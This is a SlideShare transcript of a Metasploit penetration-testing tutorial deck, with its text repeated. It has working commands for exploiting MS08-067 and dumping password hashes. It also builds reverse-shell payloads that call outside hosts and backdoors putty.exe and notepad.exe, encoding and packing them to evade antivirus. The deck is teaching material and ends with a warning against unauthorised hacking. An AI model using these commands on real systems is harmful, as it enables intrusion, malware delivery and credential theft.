SlideShare uma empresa Scribd logo
1 de 19
Baixar para ler offline
The Metasploit Framework
●   Vast collection of exploits, payloads and encoders.
●   Modules for vulnerability scanning and information gathering.
●   Modules for exploitation and session management.
●   Modules for post exploitation, pivoting and getting all up in ur base.
Basics
Exploits and Payloads
By exploiting part of a system you interact with it in a manner not anticipated by the developers with
the end goal of getting your own code(payload)/logic to execute.


Pentesting == Legal Le Hacking
 ●   PTES
 ●   Watered down process
      ○ Information Gathering
           ■ port scans, service enumeration, mapping the attack vector.
           ■ Testing payloads against AV, making sure everything is ready.
      ○ Exploitation
           ■ Attacking hosts.
           ■ Compromise from any angle.
      ○ Post Exploitation
           ■ Pivot -> back to information gathering -> Exploitation
                ● This time should be faster
                ● Password re-use
                ● Passwords to crack
                ● pass the hash/token
                ● You might already have DA, so just go and find what you're after.
Different kinds of Pentest

●   Web Applications
    ○   See OWASP
    ○   SQLi, XSS, Csrf, directory traversal, broken authentication, session
        management, access controls, reflected attacks, breaking application
        logic, client side attacks, information disclosure
●   Footprint
    ○   What hosts/services are visible to public networks, information
        disclosure, forgotten hosts, incorrectly configured hardware.
●   Infrastructure
    ○   Attacking hosts on a network, often internal to an organization or hosts
        found during the footprint.
    ○   Targeting hosts - OS and services (out dated/unpatched), weak
        password, incorrectly configured applications, zero days.
    ○   Targeting infrastructure - Routers and switches, IDS/IPS capabilities
nmap primer
●   nmap is a port scanner and OS/service fingerprinting tool.
●   It has become even more, welcome the NSE
     ○ Vuln checking and much more.

Basic Scanning:
nmap -sS 10.0.0.1-100 -p80
nmap -sS -O -A 10.0.0.55
nmap -oX - 10.0.0.1/24

In msfconsole (once you have a database connected)
msf > db_connect <username>:<password>@127.0.0.1/my_msf_db
Check that you are connected by using:
msf > db_status

db_nmap <options>
Interacting with Metasploit
msfconsole
Most used, feature rich, well supported. This is where the magic happens, make sure you run it as
root.
root@bt5:/# msfconsole
msf >


msfcli
Focused towards scripting and interaction with other command line tools. Sexy one liners.


armitage
The metasploit GUI, nice for fuzzing but lets stick to msfconsole.


Some of the other components you might use:
msfpayload, msfencode, msfvenom


Other bits of awesome:
karmasploit, SET, Wmap
Metasploit DB
First create a user and database
root@bt5:/# su postgres
postgres@bt5:/# createuser foobar -P
Enter password for new role:
Enter it again:
Shall the new role be a superuser? (y/n) n
Shall the new role be allowed to create databases? (y/n) n
Shall the new role be allowed to create more new roles? (y/n) n
postgres@bt5:/# createdb --owner=foobar foo_db

Then in msfconsole conenct to the database
msf > db_connect foobar:<password>@127.0.0.1/foo_db

From now on you can work with the database in msfconsole, db_nmap will save nmap results to the
database automaticly
Basic Commands
● use <module>
  ○ info
  ○ show options
  ○ set <option> <value>
● show
  ○ payloads
  ○ exploits
  ○ auxiliary
  ○ options
● search
  ○ string that will make your day,   "show vnc"
● back
Brute Force Attacks
Lets do a brute force dictionary attack on mysql server(s)
First step is to find hosts running mysql
nmap -sV -p3306 --open <IP Range>

If that returns some hosts, you can target a specific one or if your lazy,
skip the nmap scan and do it directly with the metasploit mysql login scanner
msf > use auxiliary/scanner/mysql/mysql_login
msf > set USERPASS /home/me/short.txt
msf > set RHOSTS <IP || Range>
msf > exploit
Shellz
A shell is software that interacts between a user and the kernel, it provides an interface for interacting with the kernel.


Bind Shell
A bind shell "binds" a interactive shell to a port on the victims host, thus allowing the attacker (or
anyone for that matter) to connect to it. A simple example using netcat; nc.exe -lvp 4444 -e cmd.exe


Reverse Shell
Creates a shell from the target host to the attackers host. Consider your target is sitting behind a NAT,
this would stop you in your tracks if you tried to create a bind shell (unless you had already
compromised their router and setup port forwarding). So if your target does not have a publicly
accessible IP (but you do) use a reverse shell. NAT lolwut


Meterpreter Shell
The meta interpreter is a payload that provides complex and advanced functionality, all functions
loaded and executed by meterpreter are done so in memory. Think of it as a meta shell with a ton of
built in features that will save you a lot of time and effort. Some useful meterpreter commands are
covered later, use the following for navigating sessions.
meterpreter > background
msf > sessions
msf > sessions -i <session #>
The Art of Exploitation
Information Gathering
msf > db_nmap -sS -O -A 192.168.24.134




Now lets check for MS08-067 since its running XP < sp 3
msf > db_nmap --script smb-check-vulns.nse -p445 192.168.24.134
msf > vulns
The Art of Exploitation
Confirming vulnerability, ready exploit

msf > vulns showed us that the host was indeed vulnerable
[*] Time: 2012-03-21 19:56:10 UTC Vuln: host=192.168.24.134 port=445 proto=tcp name=MS08-067 refs=CVE-2008-
4250,BID-31874,OSVDB-49243,CWE-94,MSFT-MS08-067,MSF-Microsoft Server Service Relative Path Stack
Corruption,NSS-34476


Time to use our first exploit, first search for it:
msf > search ms08-067
 Name                     Disclosure Date Rank Description
 ----                     --------------- ---- -----------
 exploit/windows/smb/ms08_067_netapi 2008-10-28              great Microsoft Server Service Relative Path Stack
Corruption


Time to load the exploit:
msf > use exploit/windows/smb/ms08_067_netapi


Use show options || payloads to see the configuration options available.
msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > show payloads
The Art of Exploitation
Configure the exploit
msf exploit(ms08_067_netapi) > set RHOST 192.168.24.134
RHOST => 192.168.24.134

msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp

msf exploit(ms08_067_netapi) > show options

Everything looks good, now run the exploit
The Art of Post Exploitation
Meterpreter commands of interest:
meterpreter > hashdump
meterpreter > shell

Current user, working directory and process ID
meterpreter > getuid
meterpreter > pwd
meterpreter > getpid

Now you can migrate to a more reliable process, although not really necessary in this case
meterpreter > ps
meterpreter > migrate <pid>

Some fun
meterpreter > screenshot
meterpreter > run vnc
meterpreter > run killav
MSFpayload
Used to create payloads on their own, sharing is caring.
msfpayload linux/x64/shell_reverse_tcp LHOST=41.12.1.12 LPORT=4444 x > funkytown.exe




Stealthy ninja, hidden ginger. Launch payload while continuing normal execution. -k tells payload to
launch in a separate thread (does not work with all executables, test, test, test)
root@bt:/# msfpayload windows/shell_reverse_tcp <options> R | msfencode -t exe -x putty.exe -o
var/www/putty_backdoor.exe -e x86/shikata_ga_nai -k -c 5
Multi-handler
●      You have a payload

●      The user will execute it (or you might) How do you handle the connection?

●      Welcome to the multi-handler.


root@bt:/# msfcli exploit/multi/handler PAYLOAD=windows/shell_reverse_tcp LHOST=10.0.0.15
LPORT=6666 E
[*] Please wait while we load the module tree...
[*] Started reverse handler on 10.0.0.15:6666
[*] Starting the payload handler...
[*] Command shell session 1 opened (10.0.0.15:6666 -> 10.0.0.10:1129)


C:Documents and SettingsAdministratorMy DocumentsPron Downloads> :)


Make sure the payload matches the one you created with msfpayload
MSFencode
 ●   Anti-Virus Evasion
 ●   IDS Evasion
 ●   Taking care of bad characters in your shellcode
       ○ x00 and xff


Show list of encoders:
msfencode -l

when in doubt, use x86/shikata_ga_nai a Polymorphic XOR Additive Feedback Encoder, the only
encoder that has been rated Excellent.

You can have multiple encoding runs:
msfpayload windows/meterpreter/reverse_tcp LHOST=iam.a.lhama.lol LPORT=12345 R |
msfencode -e x86/shikata_ga_nai -c 5 -t raw |
msfencode -e x86/alpha_upper -c 2 -t raw |
... Keep on Shuffling ... |
msfencode -e x86/shikata_ga_nai -c 5 -t exe -o /var/www/jouma.exe
Hiding in plain sight
Custom Executable Templates

●    msfpayload embeds payload into a default executable template (data/templates/template.exe)

●    While this template does change from time to time, AV companies check it.

●    You can however use any windows executable in place of the default.

      ○   Use the -x option


msfpayload windows/shell_reverse_tcp <options> R | msfencode -t exe -x custom/notepad.exe -o
/var/www/ponies/inurbase.exe -e x86/shikata_ga_nai -c 5


Packers
Tool that compresses an executable and combines it with decompression code.

root@bt:/# upx -5 /var/www/payload.exe
Don't be stupid
Pwnage is awesome

●   getting shellz rock.
●   realising you have remote code execution in a service is better than coke.
●   Dumping hashes and cracking them makes you laugh.

Getting caught is kak

●   and you will get caught *cough* Sabu *cough* if you mess with systems
    without authorization.
●   Having Bubba as a cellmate WILL be uncomfortable.
●   No one likes a show off.
●   Getting kicked out of university is counter productive and ill advised.
●   So...


                        DON'T BE STUPID
Don't be stupid
Bubba loves ponies, you don't want to
be a pony...

Mais conteúdo relacionado

Mais procurados

Killing any security product … using a Mimikatz undocumented feature
Killing any security product … using a Mimikatz undocumented featureKilling any security product … using a Mimikatz undocumented feature
Killing any security product … using a Mimikatz undocumented feature
Cyber Security Alliance
 

Mais procurados (20)

Metasploit for Web Workshop
Metasploit for Web WorkshopMetasploit for Web Workshop
Metasploit for Web Workshop
 
Metasploit - Basic and Android Demo
Metasploit  - Basic and Android DemoMetasploit  - Basic and Android Demo
Metasploit - Basic and Android Demo
 
Intro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenomIntro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenom
 
Pentest with Metasploit
Pentest with MetasploitPentest with Metasploit
Pentest with Metasploit
 
Fileextraction with suricata
Fileextraction with suricataFileextraction with suricata
Fileextraction with suricata
 
ICE Snow Leopard
ICE Snow LeopardICE Snow Leopard
ICE Snow Leopard
 
Beginner's Guide to the nmap Scripting Engine - Redspin Engineer, David Shaw
Beginner's Guide to the nmap Scripting Engine - Redspin Engineer, David ShawBeginner's Guide to the nmap Scripting Engine - Redspin Engineer, David Shaw
Beginner's Guide to the nmap Scripting Engine - Redspin Engineer, David Shaw
 
Killing any security product … using a Mimikatz undocumented feature
Killing any security product … using a Mimikatz undocumented featureKilling any security product … using a Mimikatz undocumented feature
Killing any security product … using a Mimikatz undocumented feature
 
Metasploit
MetasploitMetasploit
Metasploit
 
Ethical hacking with Python tools
Ethical hacking with Python toolsEthical hacking with Python tools
Ethical hacking with Python tools
 
Spraykatz installation & basic usage
Spraykatz installation & basic usageSpraykatz installation & basic usage
Spraykatz installation & basic usage
 
Suricata
SuricataSuricata
Suricata
 
Hunting Mac Malware with Memory Forensics
Hunting Mac Malware with Memory ForensicsHunting Mac Malware with Memory Forensics
Hunting Mac Malware with Memory Forensics
 
Reverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemReverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande Modem
 
Infrastructure Security
Infrastructure SecurityInfrastructure Security
Infrastructure Security
 
MINCS - containers in the shell script (Eng. ver.)
MINCS - containers in the shell script (Eng. ver.)MINCS - containers in the shell script (Eng. ver.)
MINCS - containers in the shell script (Eng. ver.)
 
Metasploit framwork
Metasploit framworkMetasploit framwork
Metasploit framwork
 
SSMF (Security Scope Metasploit Framework) - Course Syllabus
SSMF (Security Scope Metasploit Framework) - Course SyllabusSSMF (Security Scope Metasploit Framework) - Course Syllabus
SSMF (Security Scope Metasploit Framework) - Course Syllabus
 
Enumeration
EnumerationEnumeration
Enumeration
 
App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...
App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...
App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...
 

Destaque

BSides Algiers - Metasploit framework - Oussama Elhamer
BSides Algiers - Metasploit framework - Oussama ElhamerBSides Algiers - Metasploit framework - Oussama Elhamer
BSides Algiers - Metasploit framework - Oussama Elhamer
Shellmates
 
Finalppt metasploit
Finalppt metasploitFinalppt metasploit
Finalppt metasploit
devilback
 

Destaque (13)

La Quadrature Du Cercle - The APTs That Weren't
La Quadrature Du Cercle - The APTs That Weren'tLa Quadrature Du Cercle - The APTs That Weren't
La Quadrature Du Cercle - The APTs That Weren't
 
Rat a-tat-tat
Rat a-tat-tatRat a-tat-tat
Rat a-tat-tat
 
Viruses
VirusesViruses
Viruses
 
Offence oriented Defence
Offence oriented DefenceOffence oriented Defence
Offence oriented Defence
 
BSides Algiers - Metasploit framework - Oussama Elhamer
BSides Algiers - Metasploit framework - Oussama ElhamerBSides Algiers - Metasploit framework - Oussama Elhamer
BSides Algiers - Metasploit framework - Oussama Elhamer
 
Finalppt metasploit
Finalppt metasploitFinalppt metasploit
Finalppt metasploit
 
Improvement in Rogue Access Points - SensePost Defcon 22
Improvement in Rogue Access Points - SensePost Defcon 22Improvement in Rogue Access Points - SensePost Defcon 22
Improvement in Rogue Access Points - SensePost Defcon 22
 
Hacking Android OS
Hacking Android OSHacking Android OS
Hacking Android OS
 
Hacking with Remote Admin Tools (RAT)
 Hacking with Remote Admin Tools (RAT) Hacking with Remote Admin Tools (RAT)
Hacking with Remote Admin Tools (RAT)
 
Image Steganography using LSB
Image Steganography using LSBImage Steganography using LSB
Image Steganography using LSB
 
Metasploit
MetasploitMetasploit
Metasploit
 
Basic Metasploit
Basic MetasploitBasic Metasploit
Basic Metasploit
 
Ultimate Guide to Setup DarkComet with NoIP
Ultimate Guide to Setup DarkComet with NoIPUltimate Guide to Setup DarkComet with NoIP
Ultimate Guide to Setup DarkComet with NoIP
 

Semelhante a Metasploit: Pwnage and Ponies

Black hat dc-2010-egypt-uav-slides
Black hat dc-2010-egypt-uav-slidesBlack hat dc-2010-egypt-uav-slides
Black hat dc-2010-egypt-uav-slides
Bakry3
 
Client side exploits
Client side exploitsClient side exploits
Client side exploits
nickyt8
 
Security & ethical hacking
Security & ethical hackingSecurity & ethical hacking
Security & ethical hacking
Amanpreet Singh
 
Network Vulnerabilities And Cyber Kill Chain Essay
Network Vulnerabilities And Cyber Kill Chain EssayNetwork Vulnerabilities And Cyber Kill Chain Essay
Network Vulnerabilities And Cyber Kill Chain Essay
Karen Oliver
 

Semelhante a Metasploit: Pwnage and Ponies (20)

Black hat dc-2010-egypt-uav-slides
Black hat dc-2010-egypt-uav-slidesBlack hat dc-2010-egypt-uav-slides
Black hat dc-2010-egypt-uav-slides
 
Intrusion Techniques
Intrusion TechniquesIntrusion Techniques
Intrusion Techniques
 
Unmanned Aerial Vehicles: Exploit Automation with the Metasploit Framework
Unmanned Aerial Vehicles: Exploit Automation with the Metasploit FrameworkUnmanned Aerial Vehicles: Exploit Automation with the Metasploit Framework
Unmanned Aerial Vehicles: Exploit Automation with the Metasploit Framework
 
Backtrack Manual Part6
Backtrack Manual Part6Backtrack Manual Part6
Backtrack Manual Part6
 
Metasploit Computer security testing tool
Metasploit  Computer security testing toolMetasploit  Computer security testing tool
Metasploit Computer security testing tool
 
Linux Server Deep Dives (DrupalCon Amsterdam)
Linux Server Deep Dives (DrupalCon Amsterdam)Linux Server Deep Dives (DrupalCon Amsterdam)
Linux Server Deep Dives (DrupalCon Amsterdam)
 
Armitage – The Ultimate Attack Platform for Metasploit
Armitage – The  Ultimate Attack  Platform for Metasploit Armitage – The  Ultimate Attack  Platform for Metasploit
Armitage – The Ultimate Attack Platform for Metasploit
 
I hunt sys admins 2.0
I hunt sys admins 2.0I hunt sys admins 2.0
I hunt sys admins 2.0
 
Client side exploits
Client side exploitsClient side exploits
Client side exploits
 
Mitigating overflows using defense in-depth. What can your compiler do for you?
Mitigating overflows using defense in-depth. What can your compiler do for you?Mitigating overflows using defense in-depth. What can your compiler do for you?
Mitigating overflows using defense in-depth. What can your compiler do for you?
 
Linux Hardening - nullhyd
Linux Hardening - nullhydLinux Hardening - nullhyd
Linux Hardening - nullhyd
 
Backtrack Manual Part8
Backtrack Manual Part8Backtrack Manual Part8
Backtrack Manual Part8
 
Hacking 101
Hacking 101Hacking 101
Hacking 101
 
Shall we play a game?
Shall we play a game?Shall we play a game?
Shall we play a game?
 
Security & ethical hacking
Security & ethical hackingSecurity & ethical hacking
Security & ethical hacking
 
Network Vulnerabilities And Cyber Kill Chain Essay
Network Vulnerabilities And Cyber Kill Chain EssayNetwork Vulnerabilities And Cyber Kill Chain Essay
Network Vulnerabilities And Cyber Kill Chain Essay
 
The Art of Grey-Box Attack
The Art of Grey-Box AttackThe Art of Grey-Box Attack
The Art of Grey-Box Attack
 
Node.JS security
Node.JS securityNode.JS security
Node.JS security
 
Syed Ubaid Ali Jafri - Black Box Penetration testing for Associates
Syed Ubaid Ali Jafri - Black Box Penetration testing for AssociatesSyed Ubaid Ali Jafri - Black Box Penetration testing for Associates
Syed Ubaid Ali Jafri - Black Box Penetration testing for Associates
 
Hacktivity 2016: Stealthy, hypervisor based malware analysis
Hacktivity 2016: Stealthy, hypervisor based malware analysisHacktivity 2016: Stealthy, hypervisor based malware analysis
Hacktivity 2016: Stealthy, hypervisor based malware analysis
 

Último

Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
panagenda
 
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Victor Rentea
 
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
?#DUbAI#??##{{(☎️+971_581248768%)**%*]'#abortion pills for sale in dubai@
 
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Victor Rentea
 

Último (20)

Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodPolkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
 
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of Terraform
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
 
Introduction to Multilingual Retrieval Augmented Generation (RAG)
Introduction to Multilingual Retrieval Augmented Generation (RAG)Introduction to Multilingual Retrieval Augmented Generation (RAG)
Introduction to Multilingual Retrieval Augmented Generation (RAG)
 
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
 
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
 
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
 
MS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectorsMS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectors
 
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
 
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ..."I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
 
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
 
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 AmsterdamDEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
 
Platformless Horizons for Digital Adaptability
Platformless Horizons for Digital AdaptabilityPlatformless Horizons for Digital Adaptability
Platformless Horizons for Digital Adaptability
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century education
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
 
Vector Search -An Introduction in Oracle Database 23ai.pptx
Vector Search -An Introduction in Oracle Database 23ai.pptxVector Search -An Introduction in Oracle Database 23ai.pptx
Vector Search -An Introduction in Oracle Database 23ai.pptx
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
ICT role in 21st century education and its challenges
ICT role in 21st century education and its challengesICT role in 21st century education and its challenges
ICT role in 21st century education and its challenges
 

Metasploit: Pwnage and Ponies

  • 1. The Metasploit Framework ● Vast collection of exploits, payloads and encoders. ● Modules for vulnerability scanning and information gathering. ● Modules for exploitation and session management. ● Modules for post exploitation, pivoting and getting all up in ur base.
  • 2. Basics Exploits and Payloads By exploiting part of a system you interact with it in a manner not anticipated by the developers with the end goal of getting your own code(payload)/logic to execute. Pentesting == Legal Le Hacking ● PTES ● Watered down process ○ Information Gathering ■ port scans, service enumeration, mapping the attack vector. ■ Testing payloads against AV, making sure everything is ready. ○ Exploitation ■ Attacking hosts. ■ Compromise from any angle. ○ Post Exploitation ■ Pivot -> back to information gathering -> Exploitation ● This time should be faster ● Password re-use ● Passwords to crack ● pass the hash/token ● You might already have DA, so just go and find what you're after.
  • 3. Different kinds of Pentest ● Web Applications ○ See OWASP ○ SQLi, XSS, Csrf, directory traversal, broken authentication, session management, access controls, reflected attacks, breaking application logic, client side attacks, information disclosure ● Footprint ○ What hosts/services are visible to public networks, information disclosure, forgotten hosts, incorrectly configured hardware. ● Infrastructure ○ Attacking hosts on a network, often internal to an organization or hosts found during the footprint. ○ Targeting hosts - OS and services (out dated/unpatched), weak password, incorrectly configured applications, zero days. ○ Targeting infrastructure - Routers and switches, IDS/IPS capabilities
  • 4. nmap primer ● nmap is a port scanner and OS/service fingerprinting tool. ● It has become even more, welcome the NSE ○ Vuln checking and much more. Basic Scanning: nmap -sS 10.0.0.1-100 -p80 nmap -sS -O -A 10.0.0.55 nmap -oX - 10.0.0.1/24 In msfconsole (once you have a database connected) msf > db_connect <username>:<password>@127.0.0.1/my_msf_db Check that you are connected by using: msf > db_status db_nmap <options>
  • 5. Interacting with Metasploit msfconsole Most used, feature rich, well supported. This is where the magic happens, make sure you run it as root. root@bt5:/# msfconsole msf > msfcli Focused towards scripting and interaction with other command line tools. Sexy one liners. armitage The metasploit GUI, nice for fuzzing but lets stick to msfconsole. Some of the other components you might use: msfpayload, msfencode, msfvenom Other bits of awesome: karmasploit, SET, Wmap
  • 6. Metasploit DB First create a user and database root@bt5:/# su postgres postgres@bt5:/# createuser foobar -P Enter password for new role: Enter it again: Shall the new role be a superuser? (y/n) n Shall the new role be allowed to create databases? (y/n) n Shall the new role be allowed to create more new roles? (y/n) n postgres@bt5:/# createdb --owner=foobar foo_db Then in msfconsole conenct to the database msf > db_connect foobar:<password>@127.0.0.1/foo_db From now on you can work with the database in msfconsole, db_nmap will save nmap results to the database automaticly
  • 7. Basic Commands ● use <module> ○ info ○ show options ○ set <option> <value> ● show ○ payloads ○ exploits ○ auxiliary ○ options ● search ○ string that will make your day, "show vnc" ● back
  • 8. Brute Force Attacks Lets do a brute force dictionary attack on mysql server(s) First step is to find hosts running mysql nmap -sV -p3306 --open <IP Range> If that returns some hosts, you can target a specific one or if your lazy, skip the nmap scan and do it directly with the metasploit mysql login scanner msf > use auxiliary/scanner/mysql/mysql_login msf > set USERPASS /home/me/short.txt msf > set RHOSTS <IP || Range> msf > exploit
  • 9. Shellz A shell is software that interacts between a user and the kernel, it provides an interface for interacting with the kernel. Bind Shell A bind shell "binds" a interactive shell to a port on the victims host, thus allowing the attacker (or anyone for that matter) to connect to it. A simple example using netcat; nc.exe -lvp 4444 -e cmd.exe Reverse Shell Creates a shell from the target host to the attackers host. Consider your target is sitting behind a NAT, this would stop you in your tracks if you tried to create a bind shell (unless you had already compromised their router and setup port forwarding). So if your target does not have a publicly accessible IP (but you do) use a reverse shell. NAT lolwut Meterpreter Shell The meta interpreter is a payload that provides complex and advanced functionality, all functions loaded and executed by meterpreter are done so in memory. Think of it as a meta shell with a ton of built in features that will save you a lot of time and effort. Some useful meterpreter commands are covered later, use the following for navigating sessions. meterpreter > background msf > sessions msf > sessions -i <session #>
  • 10. The Art of Exploitation Information Gathering msf > db_nmap -sS -O -A 192.168.24.134 Now lets check for MS08-067 since its running XP < sp 3 msf > db_nmap --script smb-check-vulns.nse -p445 192.168.24.134 msf > vulns
  • 11. The Art of Exploitation Confirming vulnerability, ready exploit msf > vulns showed us that the host was indeed vulnerable [*] Time: 2012-03-21 19:56:10 UTC Vuln: host=192.168.24.134 port=445 proto=tcp name=MS08-067 refs=CVE-2008- 4250,BID-31874,OSVDB-49243,CWE-94,MSFT-MS08-067,MSF-Microsoft Server Service Relative Path Stack Corruption,NSS-34476 Time to use our first exploit, first search for it: msf > search ms08-067 Name Disclosure Date Rank Description ---- --------------- ---- ----------- exploit/windows/smb/ms08_067_netapi 2008-10-28 great Microsoft Server Service Relative Path Stack Corruption Time to load the exploit: msf > use exploit/windows/smb/ms08_067_netapi Use show options || payloads to see the configuration options available. msf exploit(ms08_067_netapi) > show options msf exploit(ms08_067_netapi) > show payloads
  • 12. The Art of Exploitation Configure the exploit msf exploit(ms08_067_netapi) > set RHOST 192.168.24.134 RHOST => 192.168.24.134 msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp PAYLOAD => windows/meterpreter/bind_tcp msf exploit(ms08_067_netapi) > show options Everything looks good, now run the exploit
  • 13. The Art of Post Exploitation Meterpreter commands of interest: meterpreter > hashdump meterpreter > shell Current user, working directory and process ID meterpreter > getuid meterpreter > pwd meterpreter > getpid Now you can migrate to a more reliable process, although not really necessary in this case meterpreter > ps meterpreter > migrate <pid> Some fun meterpreter > screenshot meterpreter > run vnc meterpreter > run killav
  • 14. MSFpayload Used to create payloads on their own, sharing is caring. msfpayload linux/x64/shell_reverse_tcp LHOST=41.12.1.12 LPORT=4444 x > funkytown.exe Stealthy ninja, hidden ginger. Launch payload while continuing normal execution. -k tells payload to launch in a separate thread (does not work with all executables, test, test, test) root@bt:/# msfpayload windows/shell_reverse_tcp <options> R | msfencode -t exe -x putty.exe -o var/www/putty_backdoor.exe -e x86/shikata_ga_nai -k -c 5
  • 15. Multi-handler ● You have a payload ● The user will execute it (or you might) How do you handle the connection? ● Welcome to the multi-handler. root@bt:/# msfcli exploit/multi/handler PAYLOAD=windows/shell_reverse_tcp LHOST=10.0.0.15 LPORT=6666 E [*] Please wait while we load the module tree... [*] Started reverse handler on 10.0.0.15:6666 [*] Starting the payload handler... [*] Command shell session 1 opened (10.0.0.15:6666 -> 10.0.0.10:1129) C:Documents and SettingsAdministratorMy DocumentsPron Downloads> :) Make sure the payload matches the one you created with msfpayload
  • 16. MSFencode ● Anti-Virus Evasion ● IDS Evasion ● Taking care of bad characters in your shellcode ○ x00 and xff Show list of encoders: msfencode -l when in doubt, use x86/shikata_ga_nai a Polymorphic XOR Additive Feedback Encoder, the only encoder that has been rated Excellent. You can have multiple encoding runs: msfpayload windows/meterpreter/reverse_tcp LHOST=iam.a.lhama.lol LPORT=12345 R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/alpha_upper -c 2 -t raw | ... Keep on Shuffling ... | msfencode -e x86/shikata_ga_nai -c 5 -t exe -o /var/www/jouma.exe
  • 17. Hiding in plain sight Custom Executable Templates ● msfpayload embeds payload into a default executable template (data/templates/template.exe) ● While this template does change from time to time, AV companies check it. ● You can however use any windows executable in place of the default. ○ Use the -x option msfpayload windows/shell_reverse_tcp <options> R | msfencode -t exe -x custom/notepad.exe -o /var/www/ponies/inurbase.exe -e x86/shikata_ga_nai -c 5 Packers Tool that compresses an executable and combines it with decompression code. root@bt:/# upx -5 /var/www/payload.exe
  • 18. Don't be stupid Pwnage is awesome ● getting shellz rock. ● realising you have remote code execution in a service is better than coke. ● Dumping hashes and cracking them makes you laugh. Getting caught is kak ● and you will get caught *cough* Sabu *cough* if you mess with systems without authorization. ● Having Bubba as a cellmate WILL be uncomfortable. ● No one likes a show off. ● Getting kicked out of university is counter productive and ill advised. ● So... DON'T BE STUPID
